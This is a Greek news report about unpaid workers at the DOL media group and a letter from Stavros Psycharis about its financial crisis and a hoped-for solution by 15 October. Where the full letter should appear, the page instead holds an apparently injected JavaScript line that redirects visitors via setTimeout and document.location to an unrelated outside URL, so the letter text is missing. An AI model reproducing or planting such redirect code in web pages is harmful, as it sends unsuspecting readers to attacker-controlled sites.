Επιστολή Ψυχάρη στους εργαζoμένους του ΔΟΛ

0
5

 

Συνέλευση πραγματοποίησαν χθες το απόγευμα οι εργαζόμενοι του ΔΟΛ που παραμένουν απλήρωτοι τέσσερις μήνες. Ο Στ. Ψυχάρης απέστειλε επιστολή προκειμένου να τους ενημερώσει ενώ εκφράζει την ευχή να έχει βρεθει λύση έως τις15 Οκτωβρίου.

«Εμείς πιστεύουμε ότι θα ξεπεράσουμε την κρίση χωρίς να ανταποκριθούμε στις γνωστές φωνές των σειρήνων, στων οποίων τα κελεύσματα, αν είχαμε υποκύψει, δεν θα ήμασταν τώρα εδώ» γράφει στην επιστολή ο Ψυχάρης και συνεχίζει:

«Ο ΔΟΛ έχει μια ιστορία οχι μόνο πολιτική αλλά και επιχειρηματική. Ως και τα τελευταία χρόνια ο ΔΟΛ ήταν η μόνη δημοσιογραφική επιχείρηση στην Ελλάδα που πλήρωνε προκαταβολικά τους μισθούς. Δεν θα γίνουμε τώρα μπαταχτσήδες. Αν το καράβι πέσει σε ξέρες, στα αμπάρια του θα υπάρχουν όσα χρειάζονται για να τελειώσει μια συνεργασία κλπ. Οπωσδήποτε ελπίζουμε ότι θα έχουμε λύσει το πρόβλημα μέχρι τις 15 Οκτωβρίου».

Ο κ. Ψυχάρης αναφέρει ότι ο Οργανισμός αντιμετωπίζει οικονομικό πρόβλημα λόγω της πώσης στη διαφημιστική αγορά και ότι δέχεται πόλεμο.

Ενδέχεται έως τις 15 Οκτωβρίου να υπάρξει κάποια λύση, διαφορετικά θα υπάρξουν άλλες εξελίξεις ενώ πληροφορίες αναφέρουν ότι εξετάζεται λύση τύπου Μαρινόπουλου. Κάποιες άλλες πηγές αναφέρουν ότι οι τράπεζες έχουν βρει κάποιον επενδυτή για να μπει μέτοχος με ένα ποσοστό.

Αναλυτικά η επιστολή:

psixaris-epistoli setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here